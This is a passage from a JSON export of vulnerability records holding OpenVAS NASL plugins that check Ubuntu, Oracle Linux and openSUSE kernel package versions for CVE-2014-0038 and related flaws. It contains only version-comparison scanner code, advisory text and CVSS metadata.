isdpkgvuln(pkg:\"linux-image-3.8.0-35-generic\", ver:\"3.8.0-35.52~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:32", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-03T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-2094-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310841698", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841698", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2094_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-2094-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841698\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-03 14:08:44 +0530 (Mon, 03 Feb 2014)\");\n script_cve_id(\"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-2094-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Pageexec reported a bug in the Linux kernel's recvmsg syscall\nwhen called from code using the x32 ABI. An unprivileged local user could\nexploit this flaw to cause a denial of service (system crash) or gain\nadministrator privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2094-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2094-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-35-generic\", ver:\"3.8.0-35.52~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:32", "description": "Oracle Linux Local Security Checks ELSA-2014-3034", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2014-3034", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2013-7266", "CVE-2014-0196", "CVE-2014-2309", "CVE-2014-0049", "CVE-2013-6885", "CVE-2013-4587"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123411", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-3034.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123411\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:03:27 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-3034\");\n script_tag(name:\"insight\", value:\"ELSA-2014-3034 - Unbreakable Enterprise kernel security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-3034\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-3034.html\");\n script_cve_id(\"CVE-2014-0196\", \"CVE-2014-2309\", \"CVE-2014-0049\", \"CVE-2014-0038\", \"CVE-2013-4587\", \"CVE-2013-7266\", \"CVE-2013-6885\");\n script_tag(name:\"cvss_base\", value:\"7.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dtrace-modules\", rpm:\"dtrace-modules~3.8.13~35.el6uek~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-headers\", rpm:\"dtrace-modules-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dtrace-modules-provider-headers\", rpm:\"dtrace-modules-provider-headers~0.4.3~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek\", rpm:\"kernel-uek~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug\", rpm:\"kernel-uek-debug~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-debug-devel\", rpm:\"kernel-uek-debug-devel~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-devel\", rpm:\"kernel-uek-devel~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-doc\", rpm:\"kernel-uek-doc~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"kernel-uek-firmware\", rpm:\"kernel-uek-firmware~3.8.13~35.el6uek\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2017-12-12T11:10:00", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2014-02-11T00:00:00", "type": "openvas", "title": "SuSE Update for kernel openSUSE-SU-2014:0205-1 (kernel)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2013-6432", "CVE-2013-4511", "CVE-2013-6368", "CVE-2013-4563", "CVE-2013-6367", "CVE-2013-6376", "CVE-2013-4587"], "modified": "2017-12-08T00:00:00", "id": "OPENVAS:850565", "href": "http://plugins.openvas.org/nasl.php?oid=850565", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_0205_1.nasl 8044 2017-12-08 08:32:49Z santu $\n#\n# SuSE Update for kernel openSUSE-SU-2014:0205-1 (kernel)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850565);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-11 10:38:00 +0530 (Tue, 11 Feb 2014)\");\n script_cve_id(\"CVE-2013-4511\", \"CVE-2013-4563\", \"CVE-2013-4587\", \"CVE-2013-6367\",\n \"CVE-2013-6368\", \"CVE-2013-6376\", \"CVE-2013-6432\", \"CVE-2014-0038\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for kernel openSUSE-SU-2014:0205-1 (kernel)\");\n\n tag_insight = \"\n The Linux Kernel was updated to version 3.11.10, fixing\n security issues and bugs:\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - HID: usbhid: fix sis quirk (bnc#859804).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - HID: usbhid: quirk for Synaptics Quad HD touchscreen\n (bnc#859804).\n - HID: usbhid: quirk for Synaptics HD touchscreen\n (bnc#859804).\n - HID: usbhid: merge the sis quirk (bnc#859804).\n - HID: hid-multitouch: add support for SiS panels\n (bnc#859804).\n - HID: usbhid: quirk for SiS Touchscreen (bnc#859804).\n - HID: usbhid: quirk for Synaptics Large Touchccreen\n (bnc#859804).\n\n - drivers: net: cpsw: fix dt probe for one port ethernet.\n - drivers: net: cpsw: fix for cpsw crash when build as\n modules.\n - dma: edma: Remove limits on number of slots.\n - dma: edma: Leave linked to Null slot instead of DUMMY\n slot.\n - dma: edma: Find missed events and issue them.\n - dma: edma: Write out and handle MAX_NR_SG at a given time.\n - dma: edma: Setup parameters to DMA MAX_NR_SG at a time.\n - ARM: edma: Add function to manually trigger an EDMA\n channel.\n - ARM: edma: Fix clearing of unused list for DT DMA\n resources.\n\n - ACPI: Add Toshiba NB100 to Vista _OSI blacklist.\n - ACPI: add missing win8 OSI comment to blacklist\n (bnc#856294).\n - ACPI: update win8 OSI blacklist.\n - ACPI: blacklist win8 OSI for buggy laptops.\n - ACPI: blacklist win8 OSI for ASUS Zenbook Prime UX31A\n (bnc#856294).\n\n - ACPI: Blacklist Win8 OSI for some HP laptop 2013 models\n (bnc#856294).\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - ping: prevent NULL pointer dereference on write to\n msg_name (bnc#854175 CVE-2013-6432).\n\n - x86/dumpstack: Fix printk_address for direct addresses\n (bnc#845621).\n - Refresh patches.suse/stack-unwind.\n - Refresh patches.xen/xen-x86_64-dump-user-pgt.\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - Build the KOTD against openSUSE:13.1:Update\n\n - xencons: generalize use of add_preferred_console()\n (bnc#733022, bnc#852652).\n - Update Xen patches to 3.11.10.\n - Rename patches.xen/xen-pcpu-hotplug to\n patches.xen/xen-pcpu.\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - ipv6: fix he ...\n\n Description truncated, for more information please check the Reference URL\";\n\n tag_affected = \"kernel on openSUSE 13.1\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: \"2014:0205_1\");\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE13.1\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-default-devel-debuginfo\", rpm:\"kernel-default-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-syms\", rpm:\"kernel-syms~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop\", rpm:\"kernel-desktop~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base\", rpm:\"kernel-desktop-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-base-debuginfo\", rpm:\"kernel-desktop-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debuginfo\", rpm:\"kernel-desktop-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-debugsource\", rpm:\"kernel-desktop-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel\", rpm:\"kernel-desktop-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-desktop-devel-debuginfo\", rpm:\"kernel-desktop-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2\", rpm:\"kernel-ec2~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base\", rpm:\"kernel-ec2-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-base-debuginfo\", rpm:\"kernel-ec2-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debuginfo\", rpm:\"kernel-ec2-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-debugsource\", rpm:\"kernel-ec2-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel\", rpm:\"kernel-ec2-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-ec2-devel-debuginfo\", rpm:\"kernel-ec2-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace\", rpm:\"kernel-trace~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base\", rpm:\"kernel-trace-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-base-debuginfo\", rpm:\"kernel-trace-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debuginfo\", rpm:\"kernel-trace-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-debugsource\", rpm:\"kernel-trace-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel\", rpm:\"kernel-trace-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-trace-devel-debuginfo\", rpm:\"kernel-trace-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla\", rpm:\"kernel-vanilla~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debuginfo\", rpm:\"kernel-vanilla-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-debugsource\", rpm:\"kernel-vanilla-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel\", rpm:\"kernel-vanilla-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-vanilla-devel-debuginfo\", rpm:\"kernel-vanilla-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base\", rpm:\"kernel-xen-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-base-debuginfo\", rpm:\"kernel-xen-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-debugsource\", rpm:\"kernel-xen-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xen-devel-debuginfo\", rpm:\"kernel-xen-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-docs\", rpm:\"kernel-docs~3.11.10~7.3\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source\", rpm:\"kernel-source~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-source-vanilla\", rpm:\"kernel-source-vanilla~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae\", rpm:\"kernel-pae~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base\", rpm:\"kernel-pae-base~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-base-debuginfo\", rpm:\"kernel-pae-base-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debuginfo\", rpm:\"kernel-pae-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-debugsource\", rpm:\"kernel-pae-debugsource~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel\", rpm:\"kernel-pae-devel~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-pae-devel-debuginfo\", rpm:\"kernel-pae-devel-debuginfo~3.11.10~7.1\", rls:\"openSUSE13.1\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-31T18:39:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2014-02-11T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2014:0205-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2013-6432", "CVE-2013-4511", "CVE-2013-6368", "CVE-2013-4563", "CVE-2013-6367", "CVE-2013-6376", "CVE-2013-4587"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850565", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850565", "sourceData": "# Copyright (C) 2014 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850565\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 